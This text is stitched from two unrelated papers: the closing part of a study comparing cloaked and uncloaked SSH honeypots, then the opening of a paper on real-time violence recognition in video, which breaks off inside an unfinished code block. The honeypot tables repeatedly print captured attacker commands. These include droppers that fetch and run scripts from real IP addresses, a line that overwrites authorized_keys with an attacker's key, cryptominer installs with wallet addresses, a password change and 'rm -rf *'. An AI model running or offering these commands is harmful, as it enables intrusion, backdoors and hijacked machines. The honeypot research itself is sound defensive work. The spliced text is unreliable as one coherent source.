47     5.042918                      cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r.sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54.sh.sh; sh.sh; rm -rf sh bins.sh.sh.sh; rm -rf *
33     3.540773                      cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
20     2.145923                      wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main
17     1.824034                      cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://136.144.41.55/Saitama.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
12     1.287554                      curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; echo -e "xox0\nxox0" | passwd

The cloaked system, as shown in Table 13, has 14 fingerprinting commands among its top 20, accounting for 76% of the top 20 command executions, while the uncloaked system, as shown in Table 12, has 15 fingerprinting commands, accounting for 64.8%. These findings support our hypothesis and are consistent with our earlier finding that the cloaked SSH honeypot received more attacker traffic than the uncloaked honeypot. As previously stated, the numbers of commands executed on the two honeypots are fairly close, but the cloaked honeypot received more commands overall, as our hypothesis predicted as a result of the fingerprint resistance built into it. However, because the difference is not very large, we suggest that more research be conducted to validate the claim that cloaking a honeypot increases attacker traffic. The data show that the cloaked honeypot received many more login attempts and a much higher ratio of successful logins than the uncloaked one. The data are less conclusive on the number of commands: the cloaked machine received only about 100 more commands than the uncloaked machine. Since the numbers are so close, future research is necessary to ensure the results are repeatable; a larger difference in the number of commands executed would make the argument much stronger. The complete list of the top 20 executed commands can be found in Appendix A. Overall, the data collected on the cloaked and uncloaked machines show that the cloaked honeypot received more traffic, which supports our hypothesis.
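The top 20 shares quoted in this section (32.7% and 64.8% for the uncloaked honeypot, 21.4% and 76% for the cloaked one) can be checked against the execution counts in Appendix A. The grouping of each row into "dropper", "fingerprint", or "other" below is our reading of Tables 10 to 15; the "other" group holds the "Enter new UNIX password:" row, which belongs to neither category.

```python
# Execution counts of the top 20 commands, grouped by our reading of Tables 10 to 15.
top20 = {
    "uncloaked": {
        "dropper": [132, 25, 17, 11],
        "fingerprint": [43] + [25] * 12 + [13, 10],
        "other": [14],
    },
    "cloaked": {
        "dropper": [47, 33, 20, 17, 12],
        "fingerprint": [47, 34, 34] + [33] * 10 + [12],
        "other": [15],
    },
}


def shares(groups):
    """Return each group's share (in percent) of all top 20 command executions."""
    total = sum(sum(values) for values in groups.values())
    return {name: 100.0 * sum(values) / total for name, values in groups.items()}


result = {machine: shares(groups) for machine, groups in top20.items()}
for machine, share in result.items():
    print(machine, {name: round(value, 2) for name, value in share.items()})
```

The computed shares agree with the reported values to within rounding, so the percentages in the captions of Tables 10 to 13 are shares of top 20 executions rather than of all commands received.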

Table 12. Uncloaked honeypot fingerprinting commands (64.8% of top 20 commands executed)
Count  Percentage of total commands  Command executed
43     5.193237                      uname -a
25     3.019324                      which ls
25     3.019324                      w
25     3.019324                      uname -m
25     3.019324                      uname
25     3.019324                      top
25     3.019324                      lscpu | grep Model
25     3.019324                      ls -lh $(which ls)
25     3.019324                      free -m | grep Mem | awk '{print $2,$3, $4, $5, $6, $7}'
25     3.019324                      crontab -l
25     3.019324                      cat /proc/cpuinfo | grep name | wc -l
25     3.019324                      cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
25     3.019324                      cat /proc/cpuinfo | grep model | grep name | wc -l
13     1.570048                      uname -s -v -n -r -m
10     1.084599                      cat /proc/cpuinfo

Table 13. Cloaked honeypot fingerprinting commands (76% of top 20 commands executed)
Count  Percentage of total commands  Command executed
47     5.042918                      uname -a
34     3.648069                      top
34     3.648069                      cat /proc/cpuinfo | grep name | wc -l
33     3.540773                      which ls
33     3.540773                      w
33     3.540773                      uname -m
33     3.540773                      uname
33     3.540773                      lscpu | grep Model
33     3.540773                      ls -lh $(which ls)
33     3.540773                      free -m | grep Mem | awk '{print $2,$3, $4, $5, $6, $7}'
33     3.540773                      crontab -l
33     3.540773                      cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
33     3.540773                      cat /proc/cpuinfo | grep model | grep name | wc -l
12     1.287554                      uname -s -v -n -r -m

6 Conclusion
Based on the data and analysis, this study concludes that a cloaked SSH honeypot is more successful in attracting attackers' attention than an uncloaked SSH honeypot. The cloaked system saw more commands and login attempts overall, more successful logins, more malware installed, and more targeted attacks from similar IP subnets. The uncloaked SSH honeypot was less effective, with more failed login attempts, fewer commands executed, less malware installed, and more diverse attacker source IPs. Nonetheless, there was a lot of interest in both, with nearly 5,000 uncloaked login attempts and nearly 14,000 cloaked login attempts in the roughly two-week collection period (April 5 to April 18, 2022). Interestingly, both honeypots received roughly the same number of commands even though the cloaked honeypot had significantly more login attempts, which we attribute to more fingerprinting per login on the uncloaked machine. This leads to the conclusion that successfully cloaking the honeypot will make or break the ability to intercept malware and understand modern attacker tactics. It is critical to make the honeypot as credible as possible in order to obtain the best data possible. If the attackers are not persuaded, the data collected will be of little use, most likely just fingerprinting commands with no value for malware research. Running a cloaked and an uncloaked server side by side makes it evident that most attackers are experienced enough to tell the difference between a low-effort honeypot and a real machine. Even though the data collected support our hypothesis, we suggest further research to confirm that a similar outcome can be reproduced.
7 Future Work
There are numerous variables to consider when investigating the effectiveness of various honeypot configurations. In this research paper, we added convincing config files, modified existing config files, and added commands that were not on the default honeypot. However, this project did not study the impact of changing more configurations or adding further files. This should be studied in future research, as it would provide greater insight into which configurations and files have the most significant impact in creating a convincing honeypot. Specifically, adding convincing private business files to the honeypot would allow for analysis of attackers' methods once they have discovered information they think is confidential to the business. Stemming from the idea of attackers looking for specific targets, future research should also explore the impact of installing other servers on the honeypot machines, such as web servers, databases, VPN servers, or cell modems, to discover whether any particular service installed alongside the SSH honeypot increases attacker interest.
Another area for further research is analyzing the difference in attacks and methods between different subnets on the internet. Our research was conducted in subnets controlled by the AWS us-east-2 region and did not control for the subnet in which each honeypot was located; future research should control for that variable. The unmodified honeypot had an internet address in the 18.119.0.0/16 subnet, and the cloaked honeypot had an internet address in the 13.58.0.0/16 subnet, which could have reduced the usefulness of our collected data. It would be beneficial to study how the types of attacks differ if the research were conducted on another kind of network, such as a university, government, or ISP network.
Future work should attempt to replicate the results of this research paper in order to validate the assertion that cloaked honeypots receive more traffic.
Acknowledgment. This project was made possible by the help of Dr. Khan, who provided valuable insight and advice throughout our project journey. We would not have been able to reach the designated objective without his help. Thanks must also be given to GitHub user 411Hall for providing guidance on which aspects of the honeypot to cloak in order to effectively evade detection. This guidance was essential for the validity of the research project.
Appendix A

Table 14. Cloaked server executed commands
Count  Percentage  Command executed
47     5.042918    uname -a
47     5.042918    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r.sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54.sh.sh; sh.sh; rm -rf sh bins.sh.sh.sh; rm -rf *
34     3.648069    top
34     3.648069    cat /proc/cpuinfo | grep name | wc -l
33     3.540773    which ls
33     3.540773    w
33     3.540773    uname -m
33     3.540773    uname
33     3.540773    lscpu | grep Model
33     3.540773    ls -lh $(which ls)
33     3.540773    free -m | grep Mem | awk '{print $2,$3, $4, $5, $6, $7}'
33     3.540773    crontab -l
33     3.540773    cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
33     3.540773    cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
33     3.540773    cat /proc/cpuinfo | grep model | grep name | wc -l
20     2.145923    wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main
17     1.824034    cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://136.144.41.55/Saitama.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
15     1.609442    Enter new UNIX password:
12     1.287554    uname -s -v -n -r -m
12     1.287554    curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; echo -e "xox0\nxox0" | passwd

Table 15. Uncloaked server executed commands
Count  Percentage  Command executed
132    15.942029   cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r.sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54.sh.sh; sh.sh; rm -rf sh bins.sh.sh.sh; rm -rf *
43     5.193237    uname -a
25     3.019324    which ls
25     3.019324    w
25     3.019324    uname -m
25     3.019324    uname
25     3.019324    top
25     3.019324    lscpu | grep Model
25     3.019324    ls -lh $(which ls)
25     3.019324    free -m | grep Mem | awk '{print $2,$3, $4, $5, $6, $7}'
25     3.019324    crontab -l
25     3.019324    cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
25     3.019324    cat /proc/cpuinfo | grep name | wc -l
25     3.019324    cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
25     3.019324    cat /proc/cpuinfo | grep model | grep name | wc -l
17     2.05314     wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main
14     1.690821    Enter new UNIX password:
13     1.570048    uname -s -v -n -r -m
11     1.328502    cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://136.144.41.55/Saitama.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
10     1.084599    cat /proc/cpuinfo

References 1. Al-Mohannadi, H., Awan, I., Al Hamar, J.: Analysis of adversary activities using cloudbased web services to enhance cyber threat intelligence - service oriented computing and applications. SpringerLink (2020). https://link.springer.com/article/https://doi.org/10.1007/ s11761-019-00285-7. Accessed 18 April 2022 2. Baser, M., Guven, E.: SSH and telnet protocols attack analysis using Honeypot Technique: analysis of SSH and telnet honeypot. IEEE Xplore (n.d.). https://ieeexplore.ieee.org/abstract/ document/9558948. Accessed 18 April 2022 3. French, D.: How to setup “Cowrie” - an SSH honeypot. Medium (2018). https://medium.com/ threatpunter/how-to-setup-cowrie-an-ssh-honeypot-535a68832e4c. Accessed 18 April 2022 4. Koniaris, I., Papadimitrious, G., Nicopolitidis, P.: Analysis and visualization of SSH attacks using honeypots. IEEE Xplore (n.d.). https://ieeexplore.ieee.org/document/6624967/. Accessed 18 April 2022 5. Corey, J.: Local Honeypot Identification. Wayback Machine (2004). https://web.archive.org/ web/20040825164022/http://www.phrack.org/unoffical/p62/p62-0x07.txt. Accessed 29 Sept 2022 6. Corey, J.: Advanced Honey Pot Identification and Exploitation. Wayback Machine (2004). https://web.archive.org/web/20040316120640/http://www.phrack.org/unoffical/p63/ p63-0x09.txt. Accessed 29 Sept 2022 7. Dornseif, M., Holz, T., Müller, S.: Honeypots and limitations of deception (2005). https:// dl.gi.de/bitstream/handle/20.500.12116/28613/GI-Proceedings.73-14.pdf. Accessed 29 Sept 2022 8. Oosterhof, M.: Cowrie/Cowrie: Cowrie SSH/telnet honeypot (2009). https://cowrie.readth edocs.io. GitHub. https://github.com/cowrie/cowrie. Accessed 18 April 2022
9. 411Hall:. Obscurer/obscurer.py at master · 411hall/obscurer. GitHub (2017). https://github. com/411Hall/obscurer/blob/master/obscurer.py. Accessed 18 April 2022 10. McCaughey, R.: Deception Using an SSH Honeypot. Naval Postgraduate School (2017). https://faculty.nps.edu/ncrowe/oldstudents/17Sep_McCaughey.htm. Accessed 18 April 2022 11. Dahbul, R., Lim, C., Purnama, J.: Enhancing Honeypot Deception Capability Through Network Service Fingerprinting. Institute of Physics (2017). https://iopscience.iop.org/article/ https://doi.org/10.1088/1742-6596/801/1/012057/pdf. Accessed 29 Sept 2022 12. Cukier, M.: Study: Hackers attack every 39 seconds. Study: Hackers Attack Every 39 Seconds | A James Clark School of Engineering, University of Maryland (2007). https://eng.umd.edu/ news/story/study-hackers-attack-every-39-seconds. Accessed 18 April 2022 13. Statista Research Department: U.S. consumers who have experienced hacking 2018. Statista (2018). https://www.statista.com/statistics/938993/share-of-online-accounts-whichhave-been-hacked/. Accessed 18 April 2022
Human Violence Recognition in Video Surveillance in Real-Time

Herwin Alayn Huillcen Baca1(B), Flor de Luz Palomino Valdivia1, Ivan Soria Solis1, Mario Aquino Cruz2, and Juan Carlos Gutierrez Caceres3

1 Jose Maria Arguedas National University, Apurimac, Peru
{hhuillcen,fpalomino,isoria}@unajma.edu.pe
2 Micaela Bastidas University, Apurimac, Peru
[email protected]
3 San Agustin National University, Arequipa, Peru
[email protected]
Abstract. The automatic detection of human violence in video surveillance attracts great attention because of its application in security, monitoring, and prevention systems. Detecting violence in real time could prevent criminal acts and even save lives. There are many investigations and proposals for the detection of violence in video surveillance; however, most of them focus on effectiveness and not on efficiency. They aim to surpass the accuracy of other proposals rather than to be applicable in a real scenario and in real time. In this work, we propose an efficient deep learning model for recognizing human violence in real time, composed of two modules: a spatial attention module (SA) and a temporal attention module (TA). SA extracts spatial features and regions of interest through the frame difference of two consecutive frames and morphological dilation. TA extracts temporal features by averaging the three RGB channels of each frame into a single channel, so that three frames form the input to a 2D CNN backbone. The proposal was evaluated in terms of efficiency, accuracy, and real-time latency. The results showed that our work has the best efficiency compared with other proposals. Accuracy was very close to that of the best proposal, and latency was very close to real time. Therefore, our model can be applied in real scenarios and in real time.

Keywords: Human violence recognition · Video surveillance · Real-time · Frame difference · Channel average · Real scenario
1 Introduction
Human action recognition is an area of great interest to the scientific community because of its applications in robotics, medicine, psychology, human-computer interaction, and, above all, video surveillance. An automatic violence detection system could raise an alert about an incident or a crime and allow action to be taken to mitigate it. It is therefore essential to detect violent activity in real time. Although the recognition of violence in videos has improved considerably, most works aim to improve performance on known datasets, and few target a real-time scenario.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 783–795, 2023. https://doi.org/10.1007/978-3-031-28073-3_52

There are many techniques for detecting violence in videos. Typical methods rely on optical flow [1–5]. When optical flow is combined with other methods, such as RGB frames as input, two-stream CNN variants [6–10], and 3D CNN variants [11–14], good results are achieved. Optical flow is thus an established motion representation for video action recognition tasks. However, extracting it is time-consuming and inefficient for real-time recognition tasks. The most promising techniques are based on deep learning [12,15–19], which, unlike optical flow, uses neural networks for feature extraction, encoding, and classification. These techniques achieve better performance and reduce the computational cost of optical flow, but they are still heavy in terms of parameters and FLOPs, so applying them in a real scenario remains a challenge.

We focus on recognizing human violence in video surveillance in a way that can be applied in a real scenario. Classification models must identify human violence at the moment it occurs, that is, in real time. Our approach therefore sets three objectives:
1. The model must be efficient in terms of parameters and FLOPs.
2. Accuracy results must be good and close to the state of the art.
3. Latency must be low enough to guarantee recognition in real time.

The motivation is that the main difficulty in processing videos is their spatio-temporal nature: video processing is computationally expensive even for short clips, because a clip can contain a large number of images. In addition, the change in spatial content between consecutive frames creates a time dimension. How to describe spatial and temporal information in order to understand the content of a video remains a challenge.
Our proposal takes on this challenge and puts forward a model that contributes to the current state of the art. Another motivation is that, although there are different proposals for recognizing human violence in video surveillance, most have focused on effectiveness rather than efficiency. As a result, there are very accurate models whose high computational cost prevents their use in real scenarios and in real time.

Our proposal contributes to the domain of video surveillance. The installation of surveillance cameras in the streets has become widespread worldwide with the aim of combating crime; however, dedicated personnel are still needed to watch the videos and identify violence. With our proposal, this task is carried out by a computer system that alerts the personnel to a violent human action in real time, so that they can take the corresponding action and mitigate the violent act, even saving lives. In line with the objectives above, the proposal also contributes to the state of the art an efficient model in terms of number of parameters, FLOPs, and latency.

The pipeline of our proposal consists of two modules. The spatial attention module (SA) extracts a map of spatial features from each frame using background extraction, RGB difference, and morphological dilation. The temporal attention module (TA) extracts features from a sequence of three consecutive frames, since violent acts are short and usually consist of punching, pushing, or kicking. We use the channel average of each of three consecutive RGB frames as input to a pre-trained 2D CNN. The rest of the document presents the related works that inspired the proposal, then the details of the proposal, and finally the experiments and results.
2 Related Work
A key factor in achieving efficiency and accuracy in recognizing human violence is the extraction of the regions or elements of a frame that are involved in a violent act; restricting processing to these regions considerably reduces the computational cost and provides better features for recognition. This process is called spatial attention, and there are good proposals for it. Regularization and object detection methods have been proposed [20,21]; the approach based on Persistence of Appearance (PA) consists of recognizing the motion boundaries of objects using the Euclidean distance between two consecutive frames. We adopt this method as our spatial attention mechanism. However, we consider the resulting boundaries too sharp, so we add a step that widens them through morphological dilation.

2D CNNs are commonly used for spatial processing of images, that is, processing along the width and height of the image. They have a moderate computational cost, but they cannot encode temporal information and therefore cannot extract spatio-temporal features from a video. One solution to this problem was a proposal based on 3D CNN [12], which takes several frames of the video as input and extracts features end to end. This proposal has good accuracy, but its high computational cost prevents its use in a real-time scenario. The inefficiency of 3D CNNs was addressed by various proposals, such as the combination of 3D CNN and DenseNet [26,30], and others such as R(2+1)D [23] and P3D [24], which replace the 3D CNN with a 2D CNN and achieve almost the same performance with far fewer parameters and FLOPs.

Regarding the recognition of human violence specifically, several current works use 2D CNN, 3D CNN, and LSTM techniques [22,25–30]. A good approach was presented by Sudhakaran [18], which uses the difference of frames as input to a CNN and combines it with an LSTM.

Another group of works still uses optical flow in two-stream models [12]. These approaches have greatly improved the performance of human violence recognition in videos but have not yet yielded results in a real-time scenario. The temporal attention module of our proposal is based on these approaches. It uses a 2D CNN with a straightforward strategy: take every three frames and average the three RGB channels of each frame into a single channel, so that the 2D CNN takes the three averages as if they were three channels; that is, we convert the
color information into temporal information, since color is not essential when recognizing violence in a video. This strategy keeps the model light, which is our goal. Finally, as a summary of the state of the art, Table 1 compares the results of the efficiency-oriented proposals and Table 2 those of the accuracy-oriented proposals.

Table 1. Comparison of efficiency-oriented proposals

Model                              #Params (M)  FLOPs (G)
C3D [12]                           78           40.04
I3D [14]                           12.3         55.7
3D CNN end to end [26]             7.4          10.43
ConvLSTM [18]                      9.6          14.4
3D CNN + DenseNet(2,4,12,8) [30]   4.34         5.73
Table 2. Comparison of accuracy-oriented proposals

Model                              Hockey (%)  Movie (%)  RWF (%)
VGG-16+LSTM [27]                   95.1        99         –
Xception+Bi-LSTM [28]              98          100        –
Flow Gated Network [31]            98          100        87.3
SPIL [33]                          96.8        98.5       89.3
3D CNN end to end [26]             98.3        100        –
3D CNN + DenseNet(2,4,6,8) [30]    97.1        100        –

3 Proposal
The main objective of the proposal is to achieve efficiency in FLOPs, adequate accuracy, and a latency that guarantees real-time use. To that end, we propose an architecture composed of two modules; Fig. 1 shows its pipeline. The spatial attention module (SA) receives T + 1 frames from the original video. It computes the motion boundaries of moving objects and eliminates regions that are not part of the motion (the background) through the frame difference of two consecutive frames. The temporal attention module (TA) receives T frames from the spatial attention module (SA) and creates spatio-temporal feature maps for the recognition of violence by averaging the channels of each frame and passing the result to a pretrained 2D CNN.
Fig. 1. Pipeline of the proposed architecture
3.1 Spatial Attention Module (SA)
When recognizing human violence in a video, the movement of people is more important than the color or background of a given frame; our spatial attention module therefore extracts the boundaries of moving objects from each frame in three steps (see Fig. 2):
1. The module takes T = 30 frames and computes the frame difference D_t of two consecutive RGB frames X_t and X_{t+1} by calculating the Euclidean distance and then summing over the channels.
2. It generates a spatial attention map M_t by applying two average pooling layers (kernel 15, stride 1) and four convolutional layers with ReLU activation (kernel 7, stride 1).
3. Finally, to extract the regions corresponding to the movement of objects, it computes the Hadamard product between M_t and the second frame X_{t+1}.
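The three steps above can be illustrated with a minimal, dependency-free sketch. It operates on tiny frames stored as nested lists and, as an assumption made only for illustration, replaces the learned pooling and convolutional layers of step 2 with a fixed threshold followed by a 3 × 3 morphological dilation. The function names and the threshold value are hypothetical and are not taken from our implementation.

```python
import math


def frame_difference(prev, curr):
    """Per-pixel Euclidean distance between two RGB frames (H x W x 3 lists)."""
    return [
        [math.sqrt(sum((c1 - c0) ** 2 for c0, c1 in zip(p0, p1)))
         for p0, p1 in zip(row0, row1)]
        for row0, row1 in zip(prev, curr)
    ]


def dilate(mask):
    """3 x 3 binary dilation: a pixel is set if it or any neighbour is set."""
    h, w = len(mask), len(mask[0])
    out = [[0] * w for _ in range(h)]
    for y in range(h):
        for x in range(w):
            for dy in (-1, 0, 1):
                for dx in (-1, 0, 1):
                    ny, nx = y + dy, x + dx
                    if 0 <= ny < h and 0 <= nx < w and mask[ny][nx]:
                        out[y][x] = 1
    return out


def spatial_attention(prev, curr, threshold=10.0):
    """Keep only the moving regions of `curr` (assumed stand-in for steps 1-3)."""
    diff = frame_difference(prev, curr)
    # Assumption: threshold + dilation replaces the learned attention layers.
    mask = dilate([[1 if d > threshold else 0 for d in row] for row in diff])
    # Hadamard (element-wise) product between the map and the second frame.
    return [
        [[m * c for c in pixel] for m, pixel in zip(mask_row, frame_row)]
        for mask_row, frame_row in zip(mask, curr)
    ]
```

Pixels that did not change between the two frames and are not adjacent to a changed pixel are set to zero, which mirrors the background removal described above.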
3.2 Temporal Attention Module (TA)
Considering that human violence mainly consists of short movements, such as punches, knife blows, or kicks, we propose a temporal attention module that feeds three consecutive frames to a 2D CNN. A 2D CNN processes frames individually and cannot, on its own, extract temporal features from a video. A 3D CNN, in contrast, can process the spatio-temporal features of a video end to end; however, it is too heavy in terms of parameters and FLOPs, making it unfeasible for our purposes.

Fig. 2. Mechanism of spatial attention module (SA)

We therefore take advantage of the fact that a 2D CNN processes the three RGB channels of a single frame: we average the three RGB channels of each of the consecutive frames X_t, X_{t+1}, X_{t+2} into a single channel (A_t), so that the 2D CNN can process three frames simultaneously (see Fig. 3). In other words, we use temporal information instead of color information. In addition, color has no significance in the recognition of human violence. The 2D CNN used in the proposal is the pretrained EfficientNet-B0 network; we chose it because its design prioritizes minimizing the number of FLOPs, which is consistent with our objective.
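The channel-averaging idea can be sketched in a few lines. The example below is only an illustration under stated assumptions: frames are nested lists, clips are grouped into non-overlapping triplets, and the function names are hypothetical. The pretrained 2D CNN that would consume the resulting three-channel inputs is not shown.

```python
def channel_average(frame):
    """Collapse an RGB frame (H x W x 3) into one channel by averaging R, G, B."""
    return [[sum(pixel) / 3 for pixel in row] for row in frame]


def stack_three_frames(f0, f1, f2):
    """Build an H x W x 3 input whose 'channels' are three consecutive frames."""
    a0, a1, a2 = channel_average(f0), channel_average(f1), channel_average(f2)
    return [
        [[p0, p1, p2] for p0, p1, p2 in zip(r0, r1, r2)]
        for r0, r1, r2 in zip(a0, a1, a2)
    ]


def clip_to_inputs(frames):
    """Group a clip into triplets (assumed non-overlapping) of stacked frames."""
    if len(frames) % 3 != 0:
        raise ValueError("number of frames must be a multiple of 3")
    return [stack_three_frames(*frames[i:i + 3])
            for i in range(0, len(frames), 3)]
```

With T = 30 input frames, this grouping yields ten three-channel inputs per clip, each with the same shape as an ordinary RGB image.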
4 Experiment and Results
We evaluate our proposal in terms of efficiency, accuracy, and latency; before that, we describe the datasets used and the model's configuration. The results also include a second configuration that uses only the temporal attention module (TA).

4.1 Datasets
Several datasets are available; we take the most representative.
Fig. 3. Mechanism of temporal attention module (TA)
RWF-2000 [31] is the largest violence detection dataset, containing 2,000 real-life surveillance video clips with a duration of 5 s each. We take RWF-2000 as the main reference because it has the most videos and is very heterogeneous in speed, background, lighting, and camera position. Hockey [32] contains 1,000 videos compiled from ice hockey footage. Each video has 50 frames, and all the videos have similar backgrounds and violent actions. Movies [32] is a smaller dataset containing 200 video clips at various resolutions. The videos are diverse in content, and those with the “violent” tag are collected from different movie clips.

4.2 Configuration Model

– The source code implementation was based on PyTorch.
– The input frames were resized to a resolution of 224 × 224.
– The models were trained using the Adam optimizer with a learning rate of 0.001.
– The batch size was 8 because of the limitations of the Nvidia GeForce RTX 2080 Super graphics card; we suggest a larger value for more capable cards.
– The number of input frames was set to 30; it must always be a multiple of 3 because of the nature of the temporal attention module (TA).
– The number of epochs was 1000.
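The settings listed above can be gathered in a small configuration object. The following sketch is an assumption about how such settings might be organized, not our actual training code; the class and field names are hypothetical, and only the values come from the list.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class TrainingConfig:
    """Hypothetical container for the hyperparameters listed above."""
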